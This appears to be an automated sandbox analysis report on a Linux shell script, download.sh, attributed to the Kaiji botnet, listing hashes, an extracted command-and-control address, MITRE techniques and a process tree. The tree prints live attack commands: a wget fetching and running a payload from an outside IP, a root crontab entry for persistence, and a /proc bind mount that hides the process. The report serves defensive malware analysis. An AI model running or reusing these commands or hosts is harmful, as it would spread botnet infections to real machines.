Analysis
max time kernel
149s
max time network
147s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20250410-en
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20250410-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system
submitted
16/04/2025, 18:46
Static task
static1
Behavioral task
behavioral1
Sample
download.sh
Resource
ubuntu1804-amd64-20250410-en
Behavioral task
behavioral2
Sample
download.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
download.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
download.sh
Resource
debian9-mipsel-20240418-en
General
Target
download.sh
Size
2KB
MD5
544a2f391e2800bac07e883d902bcc75
SHA1
cea67c26c372d03b795bbba678569256385d3b83
SHA256
1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca
SHA512
f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b
Malware Config
Extracted
kaiji
154.40.47.248:888
Signatures
Kaiji 1 IoCs
Kaiji payload
resource | yara_rule
behavioral1/files/fstream-1.dat | Kaiji
Kaiji family
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid | Process
1531 | chmod
Executes dropped EXE 3 IoCs
ioc | pid | Process
/tmp/linux_amd64 | 1532 | download.sh
/tmp/linux_amd64 | 1536 | linux_amd64
/etc/32676 | 1542 | sh
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description | ioc | Process
File opened for modification | /dev/watchdog | linux_amd64
File opened for modification | /dev/misc/watchdog | linux_amd64
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description | ioc | Process
File opened for modification | /etc/crontab | sh
Creates/modifies environment variables 1 TTPs 3 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description | ioc | Process
File opened for modification | /etc/profile.d/bash_cfg | linux_amd64
File opened for modification | /etc/profile.d/bash_cfg.sh | linux_amd64
File opened for modification | /etc/profile.d/gateway.sh | linux_amd64
Enumerates running processes
Discovers information about currently running processes on the system
Modifies init.d
description | ioc | Process
File opened for modification | /etc/init.d/alsa-utils | linux_amd64
File opened for modification | /etc/init.d/apparmor | linux_amd64
File opened for modification | /etc/init.d/bluetooth | linux_amd64
File opened for modification | /etc/init.d/cups | linux_amd64
File opened for modification | /etc/init.d/kmod | linux_amd64
File opened for modification | /etc/init.d/apport | linux_amd64
File opened for modification | /etc/init.d/cups-browsed | linux_amd64
File opened for modification | /etc/init.d/plymouth-log | linux_amd64
File opened for modification | /etc/init.d/selinux-autorelabel | linux_amd64
File opened for modification | /etc/init.d/uuidd | linux_amd64
File opened for modification | /etc/init.d/avahi-daemon | linux_amd64
File opened for modification | /etc/init.d/keyboard-setup.sh | linux_amd64
File opened for modification | /etc/init.d/rsync | linux_amd64
File opened for modification | /etc/init.d/saned | linux_amd64
File opened for modification | /etc/init.d/ssh | linux_amd64
File opened for modification | /etc/init.d/unattended-upgrades | linux_amd64
File opened for modification | /etc/init.d/speech-dispatcher | linux_amd64
File opened for modification | /etc/init.d/networking | linux_amd64
File opened for modification | /etc/init.d/procps | linux_amd64
File opened for modification | /etc/init.d/ufw | linux_amd64
File opened for modification | /etc/init.d/auditd | linux_amd64
File opened for modification | /etc/init.d/irqbalance | linux_amd64
File opened for modification | /etc/init.d/plymouth | linux_amd64
File opened for modification | /etc/init.d/x11-common | linux_amd64
File opened for modification | /etc/init.d/gdm3 | linux_amd64
File opened for modification | /etc/init.d/anacron | linux_amd64
File opened for modification | /etc/init.d/console-setup.sh | linux_amd64
File opened for modification | /etc/init.d/cron | linux_amd64
File opened for modification | /etc/init.d/spice-vdagent | linux_amd64
File opened for modification | /etc/init.d/acpid | linux_amd64
File opened for modification | /etc/init.d/hwclock.sh | linux_amd64
File opened for modification | /etc/init.d/udev | linux_amd64
File opened for modification | /etc/init.d/rsyslog | linux_amd64
File opened for modification | /etc/init.d/dbus | linux_amd64
Write file to user bin folder 4 IoCs
description | ioc | Process
File opened for modification | /usr/bin/find | linux_amd64
File opened for modification | /usr/bin/lsof | linux_amd64
File opened for modification | /usr/bin/include/find | linux_amd64
File opened for modification | /usr/bin/include/lsof | linux_amd64
Modifies Bash startup script 2 TTPs 3 IoCs
description | ioc | Process
File opened for modification | /etc/profile.d/bash_cfg | linux_amd64
File opened for modification | /etc/profile.d/bash_cfg.sh | linux_amd64
File opened for modification | /etc/profile.d/gateway.sh | linux_amd64
Changes its process name 1 IoCs
description | ioc | pid | Process
Changes the process name, possibly in an attempt to hide itself | ksoftirqd/0 | 1536 | linux_amd64
Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs
Execute scripts via Unix Shell.
pid | Process
1570 | sh
1541 | sh
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description | ioc | Process
File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | linux_amd64
File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | linux_amd64
Reads runtime system information
description | ioc | Process
File opened for reading | /proc/1204/stat | linux_amd64
File opened for reading | /proc/1/environ | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/sys/kernel/osrelease | systemctl
File opened for reading | /proc/723/stat | linux_amd64
File opened for reading | /proc/cmdline | systemctl
File opened for reading | /proc/self/stat | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/self/stat | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/sys/kernel/osrelease | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/1/environ | systemctl
File opened for reading | /proc/1/environ | systemctl
File opened for reading | /proc/filesystems | systemctl
File opened for reading | /proc/910/stat | linux_amd64
File opened for reading | /proc/filesystems | sed
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/1/environ | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/460/stat | linux_amd64
File opened for reading | /proc/sys/kernel/osrelease | systemctl
File opened for reading | /proc/filesystems | systemctl
File opened for reading | /proc/self/stat | systemctl
File opened for reading | /proc/cmdline | systemctl
File opened for reading | /proc/filesystems | systemctl
File opened for reading | /proc/sys/kernel/osrelease | systemctl
File opened for reading | /proc/1/environ | systemctl
File opened for reading | /proc/690/stat | linux_amd64
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/cmdline | systemctl
File opened for reading | /proc/1/environ | systemctl
File opened for reading | /proc/cmdline | systemctl
File opened for reading | /proc/filesystems | systemctl
File opened for reading | /proc/316/stat | linux_amd64
File opened for reading | /proc/570/stat | linux_amd64
File opened for reading | /proc/self/stat | systemctl
File opened for reading | /proc/sys/kernel/osrelease | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/cmdline | systemctl
File opened for reading | /proc/cmdline | systemctl
File opened for reading | /proc/self/stat | systemctl
File opened for reading | /proc/self/stat | systemctl
File opened for reading | /proc/filesystems | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/self/stat | systemctl
File opened for reading | /proc/1/environ | systemctl
File opened for reading | /proc/1081/stat | linux_amd64
File opened for reading | /proc/1146/stat | linux_amd64
File opened for reading | /proc/filesystems | systemctl
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/cmdline | systemctl
File opened for reading | /proc/cmdline | systemctl
File opened for reading | /proc/sys/kernel/osrelease | systemctl
File opened for reading | /proc/cmdline | systemctl
File opened for reading | /proc/1544/stat | linux_amd64
File opened for reading | /proc/filesystems | systemctl
File opened for reading | /proc/self/stat | systemctl
File opened for reading | /proc/sys/kernel/osrelease | systemctl
File opened for reading | /proc/912/stat | linux_amd64
File opened for reading | /proc/1346/stat | linux_amd64
File opened for reading | /proc/1/environ | systemctl
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description | ioc | Process
File opened for modification | /tmp/linux_amd64 | wget
Processes
Process tree (indentation shows depth; each entry gives path, command line and PID, followed by the signatures it triggered):
/tmp/download.sh  cmd: /tmp/download.sh  PID:1524
  - Executes dropped EXE
  /bin/uname  cmd: uname -s  PID:1525
  /bin/uname  cmd: uname -m  PID:1526
  /usr/bin/wget  cmd: wget -t 1 http://154.40.47.248:8000/linux_amd64  PID:1527
    - Writes file to tmp directory
  /bin/chmod  cmd: chmod +x linux_amd64  PID:1531
    - File and Directory Permissions Modification
  /tmp/linux_amd64  cmd: ./linux_amd64  PID:1532
    - Executes dropped EXE
    - Enumerates kernel/hardware configuration
    /tmp/linux_amd64  cmd: ./linux_amd64 " "  PID:1536
      - Modifies Watchdog functionality
      - Creates/modifies environment variables
      - Modifies init.d
      - Write file to user bin folder
      - Modifies Bash startup script
      - Changes its process name
      - Enumerates kernel/hardware configuration
      - Reads runtime system information
      /bin/sh  cmd: /bin/sh -c "/etc/32676&"  PID:1541
        - Executes dropped EXE
        - Command and Scripting Interpreter: Unix Shell
      /usr/sbin/service  cmd: service crond start  PID:1543
        /usr/bin/basename  cmd: basename /usr/sbin/service  PID:1545
        /usr/bin/basename  cmd: basename /usr/sbin/service  PID:1546
        /bin/systemctl  cmd: systemctl --quiet is-active multi-user.target  PID:1547
          - Reads runtime system information
        /bin/sed  cmd: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"  PID:1550
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl list-unit-files --full "--type=socket"  PID:1549
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show acpid.socket  PID:1551
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show apport-forward.socket  PID:1552
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show avahi-daemon.socket  PID:1553
        /bin/systemctl  cmd: systemctl -p Triggers show cups.socket  PID:1554
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show dbus.socket  PID:1555
        /bin/systemctl  cmd: systemctl -p Triggers show saned.socket  PID:1556
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show snapd.socket  PID:1557
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show ssh.socket  PID:1558
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show syslog.socket  PID:1559
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-fsckd.socket  PID:1560
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-initctl.socket  PID:1561
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-journald-audit.socket  PID:1562
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-journald-dev-log.socket  PID:1563
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-journald.socket  PID:1564
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-networkd.socket  PID:1565
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-rfkill.socket  PID:1566
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-udevd-control.socket  PID:1567
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-udevd-kernel.socket  PID:1568
        /bin/systemctl  cmd: systemctl -p Triggers show uuidd.socket  PID:1569
          - Reads runtime system information
      /usr/local/sbin/systemctl  cmd: systemctl start crond.service  PID:1543
      /usr/local/bin/systemctl  cmd: systemctl start crond.service  PID:1543
      /usr/sbin/systemctl  cmd: systemctl start crond.service  PID:1543
      /usr/bin/systemctl  cmd: systemctl start crond.service  PID:1543
      /sbin/systemctl  cmd: systemctl start crond.service  PID:1543
      /bin/systemctl  cmd: systemctl start crond.service  PID:1543
      /bin/sh  cmd: /bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"  PID:1570
        - Creates/modifies Cron job
        - Command and Scripting Interpreter: Unix Shell
      /usr/bin/renice  cmd: renice -20 1536  PID:1571
      /bin/mount  cmd: mount -o bind /tmp/ /proc/1536  PID:1572
      /usr/sbin/service  cmd: service cron start  PID:1574
        /usr/bin/basename  cmd: basename /usr/sbin/service  PID:1575
        /usr/bin/basename  cmd: basename /usr/sbin/service  PID:1576
        /bin/systemctl  cmd: systemctl --quiet is-active multi-user.target  PID:1577
        /bin/sed  cmd: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"  PID:1580
        /bin/systemctl  cmd: systemctl list-unit-files --full "--type=socket"  PID:1579
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show acpid.socket  PID:1581
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show apport-forward.socket  PID:1582
        /bin/systemctl  cmd: systemctl -p Triggers show avahi-daemon.socket  PID:1583
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show cups.socket  PID:1584
        /bin/systemctl  cmd: systemctl -p Triggers show dbus.socket  PID:1585
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show saned.socket  PID:1586
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show snapd.socket  PID:1587
        /bin/systemctl  cmd: systemctl -p Triggers show ssh.socket  PID:1588
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show syslog.socket  PID:1589
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-fsckd.socket  PID:1590
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-initctl.socket  PID:1591
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-journald-audit.socket  PID:1592
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-journald-dev-log.socket  PID:1593
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-journald.socket  PID:1594
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-networkd.socket  PID:1595
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-rfkill.socket  PID:1596
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-udevd-control.socket  PID:1597
        /bin/systemctl  cmd: systemctl -p Triggers show systemd-udevd-kernel.socket  PID:1598
          - Reads runtime system information
        /bin/systemctl  cmd: systemctl -p Triggers show uuidd.socket  PID:1599
          - Reads runtime system information
      /usr/local/sbin/systemctl  cmd: systemctl start cron.service  PID:1574
      /usr/local/bin/systemctl  cmd: systemctl start cron.service  PID:1574
      /usr/sbin/systemctl  cmd: systemctl start cron.service  PID:1574
      /usr/bin/systemctl  cmd: systemctl start cron.service  PID:1574
      /sbin/systemctl  cmd: systemctl start cron.service  PID:1574
      /bin/systemctl  cmd: systemctl start cron.service  PID:1574
        - Reads runtime system information
      /bin/systemctl  cmd: systemctl start crond.service  PID:1600
        - Reads runtime system information
  /bin/rm  cmd: /bin/rm /tmp/download.sh  PID:1537
/etc/32676  cmd: /etc/32676  PID:1542
  /bin/sleep  cmd: sleep 60  PID:1544
  /bin/sleep  cmd: sleep 60  PID:1616
  /bin/sleep  cmd: sleep 60  PID:1627
Network
MITRE ATT&CK Enterprise v16
Execution
  Command and Scripting Interpreter (1)
    Unix Shell (1)
  Scheduled Task/Job (1)
    Cron (1)
Persistence
  Boot or Logon Autostart Execution (2)
  Boot or Logon Initialization Scripts (1)
    RC Scripts (1)
  Event Triggered Execution (1)
    Unix Shell Configuration Modification (1)
  Hijack Execution Flow (1)
    Path Interception by PATH Environment Variable (1)
  Scheduled Task/Job (1)
    Cron (1)
Privilege Escalation
  Boot or Logon Autostart Execution (2)
  Boot or Logon Initialization Scripts (1)
    RC Scripts (1)
  Event Triggered Execution (1)
    Unix Shell Configuration Modification (1)
  Hijack Execution Flow (1)
    Path Interception by PATH Environment Variable (1)
  Scheduled Task/Job (1)
    Cron (1)
Downloads
Filesize
34B
MD5
f5a3713282e43c200f30342f5ff5e2ea
SHA1
2b2ce1a207e2b691a074c6f78f71c4785aae426a
SHA256
6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
SHA512
5bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013

Filesize
49B
MD5
7b6092eb341d814a12c0772fcbd2e4c5
SHA1
af07165fcaecae523111049ad61a67eff08183ec
SHA256
07520ca9930e4658a481259f546f4ec55912d7968b019441fc18309d23c29f97
SHA512
0365451fae150c11bda418fea8c993e8ca6528b0818a78e1c4b91757e5fb458499cc2d4ac7dacb4725082686d2d6c88cb46f2676f4961e757fa57d36464d91a6

Filesize
98B
MD5
9835effe62d8a1b41f6a6cd8057fd113
SHA1
71145150b1d03bfb36f277f7604c539442c30c05
SHA256
a3834cd0bd816bc3b28e9d2cc3dca12af6d717c3a94ee35d4ef5e0e4d6e635a0
SHA512
6b6e99977dff5c41e96e2c54e2326a562ff762fae54a472205aad3bf069bb6b3c0a1948840e65e9260c44794e1f19f47eceb6c44cc9a09f61f19dbe73930b47f

Filesize
56B
MD5
585f408444cbca746945f0cb63f2c3f0
SHA1
0e44bae17174f04514e770ca7fc4bec1007e39cd
SHA256
ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
SHA512
022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596

Filesize
1KB
MD5
fd68e894a07448b5229049cfad5ca5c8
SHA1
85f443429161fa1c111d69b308fd6d744cdef85c
SHA256
7d5fd87e6a3a6a9fe3783eeef0dd9fae0d412abbd625daed9dc06f6d7438e384
SHA512
d5f6213e3c361563f3ad318e3454c80e47ef19bcdbd8fa1875a3e83179e2091c2bd913c623322bc19c5064dfd09c8c2919cf68fcbd898d62e7d872cc7b6b17e3

Filesize
1.9MB
MD5
4a67fbaac9ab2555654663e56ad125a1
SHA1
d6dbe82c06c8bd5b83eea3daa26605b10c4e4457
SHA256
c09b6758cad544622f1a8a0e5edb64af4b952eb95ae94dcfe20fc1af2a9ab7e4
SHA512
7a88709312bfdf50b3900abeab5e916fcbb63e773b58e158b557f239d1e8b861c4294dd86cfec80e4baf199fcb606d484da991c7b42594ec8999f945a4afb154

Filesize
232KB
MD5
f11b2b59639b1edcb46026472786c747
SHA1
a6fe59e11456bc7f19e28b38aa9c1f9c1a13b70d
SHA256
189fbf2416c8205430d8eaa85e2947bc15504ca335ad4a77ec668ff3cbf9c84a
SHA512
1967f43b4b274e2afbc30e8e1bad314085e488066b22233e6ec033dbae10ae111320296b9d429e94cb3079636a37e433aeac928b4ef23a56dedae1741815416b

Filesize
159KB
MD5
e093dc78225e2a0a25e3b137c1c1e442
SHA1
c29497cfaae729eb576875e4fdfa400640ab16be
SHA256
1190f4dbc7be174de8fd4096c9bf7a28eebfac937d308b7cc533be4a1240d26e
SHA512
fe1cc7a65327732eaaee89f427c10239ba822430e34177842f4681068d78d404b1830d808a2a71b1efcc5f126c6d8c053512237421173aaa150e215a672da6f0